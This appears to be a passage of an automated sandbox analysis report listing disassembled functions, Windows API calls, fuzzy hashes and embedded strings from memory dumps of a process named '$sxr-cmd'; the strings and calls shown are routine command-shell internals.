                                                                                                                        • Part of subcall function 00007FF615504224: wcsrchr.MSVCRT ref: 00007FF6155043E6
                                                                                                                        • Part of subcall function 00007FF615504224: lstrcmpW.KERNELBASE ref: 00007FF615504401
                                                                                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF615505BC7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 346765439-0
                                                                                                                      • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                      • Instruction ID: 68f5a1a2122e288337c378cc89e3f927a81cc66a7e194ef3547712bcb401f86d
                                                                                                                      • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                      • Instruction Fuzzy Hash: 34318224B1DE4282FA24A725A45157DE291BF89FA8F545032E94EC7BA6DF3CED028700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentStrings$Free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3328510275-0
                                                                                                                      • Opcode ID: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
                                                                                                                      • Instruction ID: f4374cf378152b083dc3890dd86cde6266be022586fa9aae97598949e9edab5a
                                                                                                                      • Opcode Fuzzy Hash: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
                                                                                                                      • Instruction Fuzzy Hash: 86219931B1AF5081F6209F926448219B7B6F794BE0F985234DF8D6BBDAEF39C4528704
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileHandleType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3000768030-0
                                                                                                                      • Opcode ID: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
                                                                                                                      • Instruction ID: 506944e9e4845e30aa19ffe5ac481727f846d87abae6ab26b637d738e8a49015
                                                                                                                      • Opcode Fuzzy Hash: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
                                                                                                                      • Instruction Fuzzy Hash: DB31A22261EF4591FB648B59C5986682A62F345BB0FA8031ADB6E0B3F1EB36D461D340
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindClose.KERNELBASE(?,?,?,00007FF61551EAC5,?,?,?,00007FF61551E925,?,?,?,?,00007FF6154FB9B1), ref: 00007FF615503A56
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseFind
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1863332320-0
                                                                                                                      • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                                      • Instruction ID: 82f60fd8447f524da58521600f0c5352f10bdbe247179b31b01f44e9bdd18db1
                                                                                                                      • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                                      • Instruction Fuzzy Hash: 1E019638E08E53D6E6548715A550176E7A5FF88FA4B61D431D50EC3A76DF2CFD918300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1412018758-0
                                                                                                                      • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                      • Instruction ID: 00ec54c5fcee6a28acab618b5365d646b70c036aa8845b48095c28a5a25d8c19
                                                                                                                      • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                      • Instruction Fuzzy Hash: 1AE09209F59F0781FE142B7268410B892705F18FA4F581431CD0DC6BA6EF2CA891C310
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FB9A1,?,?,?,?,00007FF6154FD81A), ref: 00007FF6154FCDA6
                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,?,00007FF6154FB9A1,?,?,?,?,00007FF6154FD81A), ref: 00007FF6154FCDBD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1357844191-0
                                                                                                                      • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                      • Instruction ID: 080fc69e31b89d25bee3d6a20ce825260c54139ed8fcfc3363a5af662f053238
                                                                                                                      • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                      • Instruction Fuzzy Hash: 30F03C3AA18B42C6EB448B19F840078FBA1FB8AF60B599435D94E83365DF3CE855C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF6154F6F97), ref: 00007FF61550550C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DefaultLangUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 768647712-0
                                                                                                                      • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                      • Instruction ID: 6e331d3043f9a3ad817349d140854da4df32462a2d395992f116322852e9229f
                                                                                                                      • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                      • Instruction Fuzzy Hash: 09E02BBAD08A538BF6642B4170413B49953CB78FBEFC44033CB0DC56E19F2D2C415608
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4292702814-0
                                                                                                                      • Opcode ID: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                                      • Instruction ID: a85fd76e6388a08f6d406521bad5eabd2da9b796be8ed8c2a9c14f9122d6ccd7
                                                                                                                      • Opcode Fuzzy Hash: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                                      • Instruction Fuzzy Hash: A4F09050B0BB0580FE545BE1944A39523B39B8ABB0FCC4430CE4E9E3D3FD1EC4818260
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                                      • Instruction ID: 90105e012d42488bcc6ac67755e45525b8a1e803ea8ae14760ab388b36c20bf3
                                                                                                                      • Opcode Fuzzy Hash: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                                      • Instruction Fuzzy Hash: BED0C951E1BA4582FA58DBE2684E33512B39BA9BA4F8C4420DE1D89253BA1A44914651
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1294909896-0
                                                                                                                      • Opcode ID: 0adb59561bc91aea81df1b12ca5df08c492be0d1d29f7ab664d8fc4c3399ffab
                                                                                                                      • Instruction ID: 8a012d2bbaa98f5423254f6236ef3c9f4e8a1227184b8f9ccbd50181562d8c7f
                                                                                                                      • Opcode Fuzzy Hash: 0adb59561bc91aea81df1b12ca5df08c492be0d1d29f7ab664d8fc4c3399ffab
                                                                                                                      • Instruction Fuzzy Hash: 7FD01235E07B41C2EE445705D45D3B8A6A0FF49F19FA84535CA5D5A371DF3C94968700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615517F44
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF615517F5C
                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615517F9E
                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615517FFF
                                                                                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518020
                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518036
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518061
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518075
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6155180D6
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6155180EA
                                                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF615518177
                                                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF61551819A
                                                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF6155181BD
                                                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF6155181DC
                                                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF6155181FB
                                                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF61551821A
                                                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF615518239
                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518291
                                                                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6155182D7
                                                                                                                      • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6155182FB
                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF61551831A
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518364
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518378
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF61551839A
                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6155183AE
                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6155183E6
                                                                                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518403
                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF615518418
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                      • API String ID: 3637805771-3100821235
                                                                                                                      • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                      • Instruction ID: c55786e07be2cdb6db0303cd7ca8f570828f2f06a1d3a756b6e217303dac239c
                                                                                                                      • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                      • Instruction Fuzzy Hash: 72E16B39A08E52CAE7209F65A844179FBB1FB49FA5B459234DD1E937B4EF3CA805C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                                      • String ID: DPATH
                                                                                                                      • API String ID: 95024817-2010427443
                                                                                                                      • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                      • Instruction ID: 5907da2541f0eca2e19faeed21f356322d13e777e117968f8933cc79964bae13
                                                                                                                      • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                      • Instruction Fuzzy Hash: 8912643AA18A82C6EB649F259440179FFA1FB89F64F455235DA5E977A4DF3CEC00CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: [...]$ [..]$ [.]$...$:
                                                                                                                      • API String ID: 0-1980097535
                                                                                                                      • Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                                                      • Instruction ID: 87c1e07e79dd5cdb167747492cd25e74ffd98587e66ce937ea961f5e5f70b972
                                                                                                                      • Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                                                      • Instruction Fuzzy Hash: BA32917AA08F8286EB20DF25D4942F9B7B0EB45FA4F414136DA0D876A6DF3CE945C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$File$System$DateDefaultFormatInfoLangLocalLocaleUsermemmoverealloc
                                                                                                                      • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                      • API String ID: 4111365348-3662956551
                                                                                                                      • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                      • Instruction ID: f3c42d758714c7379b3ce8c3c4914c7a845126a74086a5fd2ace5a28b7e2d698
                                                                                                                      • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                      • Instruction Fuzzy Hash: 13E19E69E08E42C6EB50CF68A8401B9EBA1BF45FA8F545132D90ED76B5DF3CED458300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _wcsupr.MSVCRT ref: 00007FF61551EF33
                                                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551EF98
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551EFA9
                                                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551EFBF
